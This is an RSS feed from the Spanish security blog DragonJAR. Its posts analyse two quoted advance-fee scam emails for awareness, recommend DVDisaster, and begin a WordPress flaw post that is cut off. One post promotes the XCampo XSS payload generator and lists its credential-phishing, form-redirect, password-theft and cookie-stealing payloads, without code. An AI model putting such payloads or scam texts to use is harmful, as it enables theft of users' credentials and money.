<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; Informacion</title> <atom:link href="http://www.dragonjar.org/tag/informacion/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Mastercard y Microsoft me premiaron!!</title><link>http://www.dragonjar.org/mastercard-y-microsoft-me-premiaron.xhtml</link> <comments>http://www.dragonjar.org/mastercard-y-microsoft-me-premiaron.xhtml#comments</comments> <pubDate>Thu, 02 Sep 2010 21:20:34 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Protección de la Información]]></category> <category><![CDATA[Correo]]></category> <category><![CDATA[Español]]></category> <category><![CDATA[Estafa]]></category> <category><![CDATA[Fraude]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[Internet]]></category> <category><![CDATA[Mastercard]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Nigeriana]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4891</guid> <description><![CDATA[No puedo creer que sea una persona tan afortunada, hace poco Me gané 2 Millones de Dolares!!, y ahora Mastercard en asociación con Microsoft han reunido la suma de £952,000.00 (novecientos cincuenta y dos mil libras Gran Bretaña), para regalarlas en un sorteo donde el ganador resulte ser yo!!!. MASTERCARD ® / MICROSOFT ® PREMIO [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/09/PremioMCyMS.jpg" width="240" title="Mastercard y Microsoft me premiaron!!" alt="PremioMCyMS Mastercard y Microsoft me premiaron!!" /></p><p>No puedo creer que sea una persona tan afortunada, hace poco <a
title="Me gané 2 Millones de Dolares!!" rel="bookmark" href="../me-gane-2-millones-de-dolares.xhtml">Me gané 2 Millones de Dolares!!</a>, y ahora <a
href="http://www.dragonjar.org/tag/mastercard" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Mastercard">Mastercard</a> en asociación con <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> han reunido la suma de £952,000.00 (novecientos cincuenta y dos mil libras Gran Bretaña), para regalarlas en un sorteo donde el ganador resulte ser yo!!!.<span
id="more-4891"></span></p><blockquote><p>MASTERCARD ® / MICROSOFT ® PREMIO MAYOR SÚPER INTERNACIONAL.<br
/> Director Ejecutivo: Sr. Adam Smith.</p><p>ATTENTION: MasterCard/Microsoft <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> Award Winner:</p><p>Su dirección de correo electrónico fue seleccionado y confirmado por nuestra Internacional copatrocinador Microsoft, a través de su software más reciente de Internet. Usted ha sido aprobado tanto por MasterCard ® Internacional / Microsoft ® Corporation del Reino Unido la suma de £952,000.00 (novecientos cincuenta y dos mil libras Gran Bretaña). Estos fondos son en efectivo, mediante abono en un cheque de caja válida, con un Reg ganar. (GXC/001620-UK4). Estar informado de que su premio ha sido asegurado y listo para entregar el dinero a usted. Usted está en contacto con su oficial de créditos asignados a continuación con su información requerida es:</p><p>Departamento de Verificación de Reclamaciones.</p><p>Nombre Srs. Maria Kalsson Nurmi<br
/> Correo electrónico: premios10@live.com</p><p>Envíe realmente al susodicho Administrador de Reclamaciones por correo electrónico, inmediatamente con este Reclama Exigencias; 1. El Nombre 2 Lleno. Dirección: 3. Nacionalidad: 4. Edad: 5.Ocupación: Naturaleza de Trabajo: 6. Telefonear: Fax: 7. Estado de Origen: País: 8.Sexo: 9. Ganancia de Correo electrónico Dirección:</p><p>Modo de Premio Entrega de Remittance:Courier de su Cheque de Ganancia Certificadoy otros Documentos de Ganancia sin peligro a usted.</p><p>Atentamente,<br
/> Doctor Margarita Munoz.<br
/> Diríjasse Cliente Se preocupan el Servicio.<br
/> Copyright © 2010 MasterCard Inc el Reino Unido</p></blockquote><p>Si no alcanzaste a notar el tono sarcástico (debería existir una etiqueta para ese fin, de pronto en el HTML 6..), déjame te explico de que se trata todo esto. El correo que acabas de ver anteriormente es una variante de un conocido fraude en Internet llamado “<a
href="http://www.dragonjar.org/tag/estafa" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Estafa">Estafa</a> Nigeria”.</p><p>La estafa <a
href="http://www.dragonjar.org/tag/nigeriana" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Nigeriana">Nigeriana</a> es un fraude que normalmente se realiza por correo electrónico, consiste en ilusionar a la víctima con una gran fortuna, que en realidad no existe, con el objetivo de persuadirla para que luego envíe una”pequeña” suma de dinero por adelantado como condición para acceder a la supuesta fortuna. Es decir, se le promete a la víctima el todo o parte de una inexistente cantidad millonaria de dinero, para luego convencerla – mediante excusas muy elementales inventadas – a adelantar cierta cantidad de dinero propio al estafador.</p><p>Claramente este mensaje en particular, ha sido adaptado para el publico de habla hispana, pero al parecer es un <a
href="http://www.dragonjar.org/tag/espanol" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Español">español</a> traducido por Google (note los errores como &#8220;Diríjasse Cliente Se preocupan el Servicio.&#8221;), al responder el correo, el atacante empezara con sus dotes de <a
title="ingeniería social" href="../tag/ingenieria-social">ingeniería social</a> (y armado de toda nuestra <a
title="informacion" href="../tag/informacion">informacion</a> personal proporcionada), creara una historia personalizada, con la que intentara sacarnos nuestro dinero… pero ¿y si realmente era Mastercard con Microsoft, quien nos envío el correo?, vamos a ver como podemos diferenciar fácilmente una estafa de este tipo de un correo normal.</p><h2>Como identificar una estafa por Internet?</h2><ul><li><strong>TE PIDEN ALGO:</strong> Normalmente este tipo de estafas te piden que realices alguna acción, ya sea visitar un enlace, responder el correo, enviar información, llamar a un numero… Cuando veas un correo en el que te piden que realices alguna acción, revisalo muy bien, a menos que confíes plenamente en la persona que te envió el correo y confirmes personalmente que efectivamente esa persona fue quien te envió ese mail, <strong>NO HAGAS NADA<br
/> </strong></li><li><strong>TE OFRECEN ALGO A CAMBIO: </strong>Es mas fácil que realices una tarea si recibes algo a cambio, por eso siempre te ofrecerán algún beneficio a cambio de tu acción, mejor <a
title="seguridad" href="../">seguridad</a> en tu cuenta bancaria, trabajo, grandes cantidades de dinero, viajes, objetos, etc..</li><li><strong>DIRECCIONES DE CORREO:</strong> Por lo <a
title="general" rel="nofollow" href="../category/general" target="_blank">general</a> las direcciones desde las que se envían estos correos dejan mucho que desear, para la muestra, este correo fue enviado desde la cuenta <em><strong>museosenvivo@buenosaires.gob.ar</strong></em> (ya que posiblemente este servidor se encuentre mal configurado o fue vulnerado para enviar correo no deseado), no sabia que microsoft enviaba sus correos desde buenosaires.gob.ar, pero ahí no paran las direcciones sospechosas, en el correo nos dicen que enviemos nuestros datos a premios10@live.com y en la configuración del correo esta la cuenta premioss@live.com como la opción de respuesta por <a
href="http://www.dragonjar.org/tag/defecto" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Defecto">defecto</a>.. ¿realmente crees que Microsoft y Mastercard enviarian un premio de estos, desde cuentas gratuitas de correo?&#8230; y mas con esos nombres&#8230;.</li></ul><p>Afortunadamente para este tipo de fraudes por correo electrónico la solución es muy simple, identificar que se trata de una estafa, denunciar el correo como Spam (si tu cliente de correo lo permite) para evitar que le llegue a mas gente y <a
href="http://www.dragonjar.org/tag/eliminar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Eliminar">eliminar</a> el mensaje.</p><p><strong>Te sugiero sigas las <a
title="recomendaciones" href="../tag/recomendaciones">recomendaciones</a> que encontraras en estos artículos de la comunidad:</strong></p><ul><li><a
href="../protegerse-de-las-estafas-en-internet.xhtml">Protegerse de las estafas en Internet</a></li><li><a
href="../que-es-el-phishing.xhtml">¿Que es el Phishing?</a></li><li><a
href="../phishing-a-movistar-colombia.xhtml">Phishing a Movistar Colombia</a></li><li><a
href="../phishing-en-bancolombia.xhtml">Phishing en Bancolombia</a></li></ul><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/me-gane-2-millones-de-dolares.xhtml" title="Me gané 2 Millones de Dolares!!">Me gané 2 Millones de Dolares!!</a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-informatica-en-el-sena-virtual.xhtml" title="Sena Virtual Cursos Gratis de Informática">Sena Virtual Cursos Gratis de Informática</a></li><li><a
href="http://www.dragonjar.org/phishing-a-movistar-colombia.xhtml" title="Phishing a Movistar Colombia">Phishing a Movistar Colombia</a></li><li><a
href="http://www.dragonjar.org/vinton-cerf-padre-de-internet-en-colombia.xhtml" title="Vinton Cerf (Creador de Internet) en Colombia">Vinton Cerf (Creador de Internet) en Colombia</a></li><li><a
href="http://www.dragonjar.org/descargar-windows-7-release-candidate-1.xhtml" title="Descargar Windows 7 Release Candidate 1">Descargar Windows 7 Release Candidate 1</a></li><li><a
href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a
href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a
href="http://www.dragonjar.org/nueva-version-del-caine-livecd-para-informatica-forense.xhtml" title="Nueva Versión del CAINE, LiveCD para Informática Forense ">Nueva Versión del CAINE, LiveCD para Informática Forense </a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/mastercard-y-microsoft-me-premiaron.xhtml/feed</wfw:commentRss> <slash:comments>13</slash:comments> </item> <item><title>X Campo – Generador de payloads XSS</title><link>http://www.dragonjar.org/x-campo-generador-de-payloads-xss.xhtml</link> <comments>http://www.dragonjar.org/x-campo-generador-de-payloads-xss.xhtml#comments</comments> <pubDate>Fri, 23 Jul 2010 08:58:58 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[cookies]]></category> <category><![CDATA[Deface]]></category> <category><![CDATA[Generar]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[JavaScript]]></category> <category><![CDATA[Payload]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4680</guid> <description><![CDATA[XCampo es un generador de payloads XSS que nos brinda la posibilidad de sacarle mas jugo a una vulnerabilidad de este tipo en un sitio web, después de seleccionar el payload deseado, nos generara el código y seleccionamos si deseamos aplicarle rawurlencode() o quitarle las comillas: De momento los payloads con los que cuenta la [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/07/XCampo.jpg" width="240" title="X Campo – Generador de payloads XSS" alt="XCampo X Campo – Generador de payloads XSS" /></p><p>XCampo es un generador de payloads  XSS que nos brinda la posibilidad de sacarle mas jugo a una vulnerabilidad de este tipo en un sitio web, después de seleccionar el <a
href="http://www.dragonjar.org/tag/payload" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Payload">payload</a> deseado, nos generara el código y seleccionamos si deseamos aplicarle rawurlencode() o quitarle las comillas:</p><p
style="text-align: center;"><img
class="alignnone" title="Payloads XSS" src="http://www.dragonjar.org/wp-content/uploads/2010/07/XCampo.jpg" alt="XCampo X Campo – Generador de payloads XSS" width="326" height="325" /></p><p>De momento los payloads con los que cuenta la herramienta son:<span
id="more-4680"></span></p><ul><li><strong>Fake login:</strong> Genera un div sobre el resto de la  pagina con un campo de login falso. Los datos se envían al sitio web que  nosotros queramos y ya ahí somos responsables de hacer lo que queramos  con el usuario.</li><li><strong>hax0r defacement:</strong> Intenta poner un div sobre toda  la pagina, incluir un <a
href="http://www.dragonjar.org/tag/texto" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Texto">texto</a> e incluso reproducir una cancion.</li><li><strong>Form redirection:</strong> Muy útil en ataques XSS que se  encuentran en las paginas de login. Cambia el evento action de todos los  forms a la dirección que le digamos. Ademas elimina cualquier tipo de <a
href="http://www.dragonjar.org/tag/javascript" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con JavaScript">Javascript</a> de validación que existiera, por si acaso!</li><li><strong>Password managers:</strong> La idea es, haciendo uso de  Javascript, robar la informacion que los navegadores autocompletan  cuando hemos guardado el usuario y contraseña en una pagina. Por ahora  solo esta implementado el de <a
href="http://www.dragonjar.org/tag/internet" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Internet">Internet</a> Explorer, pero el de <a
href="http://www.dragonjar.org/tag/firefox" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Firefox">Firefox</a> no  seria dificil de hacer.</li><li><strong>Session <a
href="http://www.dragonjar.org/tag/cookies" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con cookies">cookies</a>:</strong> Lo mas típico! Podemos enviar las  cookies de un navegador hacia el dominio que queramos. Ademas existen  tres maneras de hacerlo:<ul><li>iframe</li><li>img</li><li>pop-up</li></ul></li></ul><p>Aunque es un proyecto joven, promete ser una buena herramienta para enviar el típico <a
href="http://blog.c22.cc/2010/03/16/alertxss-the-slow-death-of-xss/">alert(hola);</a>, si deseas utilizar el X Campo, <a
href="http://www.equilibrioinestable.com/xcampo/">puedes hacerlo online entrando a esta url (no es la ultima versión)</a> o <a
href="https://code.google.com/p/xcampo/">descargar el código fuente desde Google Code</a> y montarlo en tu propio sistema (la ultima versión).</p><p><strong>Mas Información:</strong><br
/> <a
href="https://equilibrioinestable.wordpress.com/2010/07/13/xcampo-y-hackbar-volviendo-a-programar/">Pagina Oficial del XCampo</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/aprender-programar-javascript.xhtml" title="¿Cómo aprender a programar en JavaScript?">¿Cómo aprender a programar en JavaScript?</a></li><li><a
href="http://www.dragonjar.org/mastercard-y-microsoft-me-premiaron.xhtml" title="Mastercard y Microsoft me premiaron!!">Mastercard y Microsoft me premiaron!!</a></li><li><a
href="http://www.dragonjar.org/me-gane-2-millones-de-dolares.xhtml" title="Me gané 2 Millones de Dolares!!">Me gané 2 Millones de Dolares!!</a></li><li><a
href="http://www.dragonjar.org/recupera-informacion-de-un-cd-o-dvd-rayado.xhtml" title="Recupera informacion de un CD o DVD rayado">Recupera informacion de un CD o DVD rayado</a></li><li><a
href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li><li><a
href="http://www.dragonjar.org/bits-y-qubits-camino-de-la-criptografia-partei.xhtml" title="Bits y Qubits, El camino de la criptografía &#8211; Parte I">Bits y Qubits, El camino de la criptografía &#8211; Parte I</a></li><li><a
href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a
href="http://www.dragonjar.org/video-ataque-de-envenamiento-de-cookies-cookie-poisoning.xhtml" title="Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)">Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/x-campo-generador-de-payloads-xss.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>Me gané 2 Millones de Dolares!!</title><link>http://www.dragonjar.org/me-gane-2-millones-de-dolares.xhtml</link> <comments>http://www.dragonjar.org/me-gane-2-millones-de-dolares.xhtml#comments</comments> <pubDate>Sat, 17 Jul 2010 08:46:07 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Variado]]></category> <category><![CDATA[Correo]]></category> <category><![CDATA[Español]]></category> <category><![CDATA[Estafa]]></category> <category><![CDATA[Fraude]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[Internet]]></category> <category><![CDATA[Nigeriana]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4688</guid> <description><![CDATA[Así es, la persona que les escribe estas lineas es Millonaria!!&#8230; acabo de recibir una carta de la Fundación Carlos Slim en la que me informan que he salido beneficiado para recibir la suma de 2 Millones de Dolares en efectivo&#8230; ¿no me creen?&#8230; miren el correo. Antes de que me envíes un correo pidiéndome [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/07/CarlosSlim.jpg" width="240" title="Me gané 2 Millones de Dolares!!" alt="CarlosSlim Me gané 2 Millones de Dolares!!" /></p><p>Así es, la persona que les escribe estas lineas es Millonaria!!&#8230; acabo de recibir una carta de la Fundación Carlos Slim en la que me informan que he salido beneficiado para recibir la suma de 2 Millones de Dolares en efectivo&#8230; ¿no me creen?&#8230; miren el correo.</p><p
style="text-align: center;"><img
class="alignnone" title="Estafa Nigeriana" src="http://www.dragonjar.org/wp-content/uploads/2010/07/CarlosSlim.jpg" alt="CarlosSlim Me gané 2 Millones de Dolares!!" width="500" height="542" /><span
id="more-4688"></span></p><p>Antes de que me envíes un correo pidiéndome dinero prestado, déjame te explico de que se trata todo esto. El correo que acabas de ver anteriormente es una variante de un conocido <a
href="http://www.dragonjar.org/tag/fraude" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Fraude">fraude</a> en <a
href="http://www.dragonjar.org/tag/internet" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Internet">Internet</a> llamado &#8220;<a
href="http://www.dragonjar.org/tag/estafa" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Estafa">Estafa</a> Nigeria&#8221;.</p><p>La estafa Nigeriana es un fraude que normalmente se realiza por correo electrónico, consiste en ilusionar a la víctima con una gran fortuna, que en realidad no existe, con el objetivo de persuadirla para que luego envíe una&#8221;pequeña&#8221; suma de dinero por adelantado como condición para acceder a la supuesta fortuna. Es decir, se le promete a la víctima el todo o parte de una inexistente cantidad millonaria de dinero, para luego convencerla &#8211; mediante excusas muy elementales inventadas &#8211; a adelantar cierta cantidad de dinero propio al estafador.</p><p>Claramente este mensaje en particular, ha sido adaptado para el publico latino,  por lo que se ha involucrando a Carlos Slim (la persona mas rica del mundo según Forbes) y esta escrito en un <a
href="http://www.dragonjar.org/tag/espanol" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Español">español</a> bien trabajado, al responder el correo, el atacante empezara con sus dotes de ingeniería social (y armado de toda nuestra <a
href="http://www.dragonjar.org/tag/informacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Informacion">informacion</a> personal proporcionada), creara una historia personalizada, con la que intentara sacarnos nuestro dinero&#8230; pero ¿y si realmente era la Fundación de Carlos Slim?, vamos a ver como podemos diferenciar fácilmente una estafa de este tipo de un correo normal.</p><h2>Como identificar una estafa por Internet?</h2><ul><li><strong>TE PIDEN ALGO:</strong> Normalmente este tipo de estafas te piden que realices alguna acción, ya sea visitar un enlace, responder el correo, enviar informacion, llamar a un numero&#8230; Cuando veas un correo en el que te piden que realices alguna acción, revisalo muy bien, a menos que confíes plenamente en la persona que te envió el correo y confirmes personalmente que efectivamente esa persona fue quien te envió ese mail, <strong>NO HAGAS NADA<br
/> </strong></li><li><strong>TE OFRECEN ALGO A CAMBIO: </strong>Es mas fácil que realices una tarea si recibes algo a cambio, por eso siempre te ofrecerán algún beneficio a cambio de tu acción, mejor <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> en tu cuenta bancaria, trabajo, grandes cantidades de dinero, viajes, objetos, etc..</li><li><strong>DIRECCIONES DE CORREO:</strong> Por lo general las direcciones desde las que se envían estos correos dejan mucho que desear, para la veracidad de su historia, en muchos casos se ve como mandan los correos desde la cuenta <em><strong>info@hi5.com</strong></em> (ya que logra pasar la mayoría de filtros y llegar a la bandeja de entrada), o como en este caso los correos no cuadran con la historia, primero que todo el mensaje es enviado desde <em><strong>korporat@kelaptan.gov.my</strong></em> que <a
href="http://www.carlosslim.com/responsabilidad.html">nada tiene que ver con la fundación carlos slim</a>&#8220;, segundo el correo de respuesta es <em><strong>carlosslim_grants@live.co.uk</strong></em>, una cuenta que cualquier personas puede crear (muy diferente a <em><strong>yo@carlosslim.com</strong></em>)</li></ul><p>Afortunadamente para este tipo de fraudes por correo electrónico la solución es muy simple, identificar que se trata de una estafa, denunciar el correo como Spam (si tu cliente de correo lo permite) para evitar que le llegue a mas gente y <a
href="http://www.dragonjar.org/tag/eliminar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Eliminar">eliminar</a> el mensaje.</p><p><strong>Te recomiendo que sigas las recomendaciones que encontraras en estos artículos de la comunidad:</strong></p><ul><li><a
href="http://www.dragonjar.org/protegerse-de-las-estafas-en-internet.xhtml">Protegerse de las estafas en Internet</a></li><li><a
href="http://www.dragonjar.org/que-es-el-phishing.xhtml">¿Que es el Phishing?</a></li><li><a
href="http://www.dragonjar.org/phishing-a-movistar-colombia.xhtml">Phishing a Movistar Colombia</a></li><li><a
href="http://www.dragonjar.org/phishing-en-bancolombia.xhtml">Phishing en Bancolombia</a></li></ul><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/mastercard-y-microsoft-me-premiaron.xhtml" title="Mastercard y Microsoft me premiaron!!">Mastercard y Microsoft me premiaron!!</a></li><li><a
href="http://www.dragonjar.org/phishing-a-movistar-colombia.xhtml" title="Phishing a Movistar Colombia">Phishing a Movistar Colombia</a></li><li><a
href="http://www.dragonjar.org/vinton-cerf-padre-de-internet-en-colombia.xhtml" title="Vinton Cerf (Creador de Internet) en Colombia">Vinton Cerf (Creador de Internet) en Colombia</a></li><li><a
href="http://www.dragonjar.org/nueva-version-del-caine-livecd-para-informatica-forense.xhtml" title="Nueva Versión del CAINE, LiveCD para Informática Forense ">Nueva Versión del CAINE, LiveCD para Informática Forense </a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-informatica-en-el-sena-virtual.xhtml" title="Sena Virtual Cursos Gratis de Informática">Sena Virtual Cursos Gratis de Informática</a></li><li><a
href="http://www.dragonjar.org/correo-gmail-sin-internet.xhtml" title="Ver, Eliminar, Redactar correo de GMail sin Internet">Ver, Eliminar, Redactar correo de GMail sin Internet</a></li><li><a
href="http://www.dragonjar.org/capacitacion-gratuita-para-realizar-el-ceh-de-ec-council.xhtml" title="Capacitación gratuita para realizar el CEH de EC-Council">Capacitación gratuita para realizar el CEH de EC-Council</a></li><li><a
href="http://www.dragonjar.org/intypedia-enciclopedia-visual-de-la-seguridad-informatica.xhtml" title="IntyPedia &#8211; Enciclopedia visual de la Seguridad Informática">IntyPedia &#8211; Enciclopedia visual de la Seguridad Informática</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/me-gane-2-millones-de-dolares.xhtml/feed</wfw:commentRss> <slash:comments>8</slash:comments> </item> <item><title>Recupera informacion de un CD o DVD rayado</title><link>http://www.dragonjar.org/recupera-informacion-de-un-cd-o-dvd-rayado.xhtml</link> <comments>http://www.dragonjar.org/recupera-informacion-de-un-cd-o-dvd-rayado.xhtml#comments</comments> <pubDate>Mon, 26 Apr 2010 15:10:34 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Variado]]></category> <category><![CDATA[CD]]></category> <category><![CDATA[Defecto]]></category> <category><![CDATA[DVD]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[Perdida]]></category> <category><![CDATA[Prevenir]]></category> <category><![CDATA[Rayado]]></category> <category><![CDATA[Recuperar]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4210</guid> <description><![CDATA[Con el paso del tiempo los CDs y DVDs se van degradando poco a poco, tanto que la información almacenada en su interior puede llegar a ser ilegible por nuestra unidad lectora y podamos perder nuestra valiosa información. Normalmente, lo que haría una persona, seria mandar a &#8220;pulir&#8221; (de forma profesional o con algún método [...]]]></description> <content:encoded><![CDATA[<p>Con el paso del tiempo los CDs y DVDs se van degradando poco a poco, tanto que la información almacenada en su interior puede llegar a ser ilegible por nuestra unidad lectora y podamos perder nuestra valiosa información.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://i.imgur.com/6BFLe.jpg/" alt=" Recupera informacion de un CD o DVD rayado"  title="Recupera informacion de un CD o DVD rayado" /></p><p>Normalmente, lo que haría una persona, seria mandar a &#8220;pulir&#8221; (de forma profesional o con algún método casero) el <a
href="http://www.dragonjar.org/tag/cd" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con CD">CD</a> o <a
href="http://www.dragonjar.org/tag/dvd" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con DVD">DVD</a> para eliminar los rayones que se encuentran en la capa exterior de su superficie, pero este procedimiento muchas veces termina con eliminar definitivamente la información y volver más delicado el <a
href="http://www.dragonjar.org/tag/disco" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con disco">disco</a>.</p><p>DVDisaster es una <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a> de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> que permite crear un archivo de corrección de errores para <a
href="http://www.dragonjar.org/tag/prevenir" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Prevenir">prevenir</a> posibles pérdidas de información en un dispositivo de almacenamiento óptico, ya sea un CD o un DVD.<span
id="more-4210"></span></p><p>El funcionamiento de DVDisaster es bien sencillo. En primer lugar, analiza el disco para comprobar la velocidad de lectura de la unidad y la legibilidad del disco; el segundo paso consiste en crear el archivo de corrección de errores y si fuera necesario, el tercer y cuarto paso permiten volver a analizar el disco y restaurar los posibles defectos a partir de él.</p><h2 style="text-align: center;"><a
href="http://dvdisaster.net/en/">Descargar DVDisaster para Recuperar tu Información en CD o DVD</a></h2><p><strong>Más Información:</strong><br
/> <a
href="http://sourceforge.net/projects/dvdisaster/">Pagina Oficial de DVDisaster</a><br
/> <a
href="http://www.kriptopolis.org/dvdisaster">Completo Articulo en Kriptopolis</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/recuperar-cuenta-de-msn-messenger-hotmail-legalmente.xhtml" title="¿Cómo Recuperar una Cuenta de MSN Messenger / Hotmail? ">¿Cómo Recuperar una Cuenta de MSN Messenger / Hotmail? </a></li><li><a
href="http://www.dragonjar.org/recupera-tu-password-de-filezilla.xhtml" title="Recupera tu Password de FileZilla">Recupera tu Password de FileZilla</a></li><li><a
href="http://www.dragonjar.org/recuperar-el-codigo-contrasena-de-iphone-ipod-touch-o-ipad.xhtml" title="Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad">Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad</a></li><li><a
href="http://www.dragonjar.org/recupera-tu-password-de-facebook.xhtml" title="Recupera tu Password de Facebook">Recupera tu Password de Facebook</a></li><li><a
href="http://www.dragonjar.org/recupera-tu-password-de-twitter.xhtml" title="Recupera tu Password de Twitter">Recupera tu Password de Twitter</a></li><li><a
href="http://www.dragonjar.org/mastercard-y-microsoft-me-premiaron.xhtml" title="Mastercard y Microsoft me premiaron!!">Mastercard y Microsoft me premiaron!!</a></li><li><a
href="http://www.dragonjar.org/truecrypt-cifra-tu-informacion-en-particiones-virtuales.xhtml" title="TrueCrypt &#8211; Cifra tu información en particiones virtuales">TrueCrypt &#8211; Cifra tu información en particiones virtuales</a></li><li><a
href="http://www.dragonjar.org/x-campo-generador-de-payloads-xss.xhtml" title="X Campo – Generador de payloads XSS">X Campo – Generador de payloads XSS</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/recupera-informacion-de-un-cd-o-dvd-rayado.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>Pueden leer tu &#8220;Basura&#8221;</title><link>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml</link> <comments>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml#comments</comments> <pubDate>Mon, 15 Feb 2010 07:33:25 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3856</guid> <description><![CDATA[Un nuevo fallo en el famoso WordPress, descubierto por el investigador Thomas Mackenzie permitiría a &#8220;cualquier&#8221; persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la &#8220;papelera&#8221;. Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada &#8220;papelera&#8220;, con la cual todos los artículos, comentarios o páginas &#8220;borradas&#8221; pasarían [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: justify;">Un nuevo fallo en el famoso <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a>, descubierto por el investigador <a
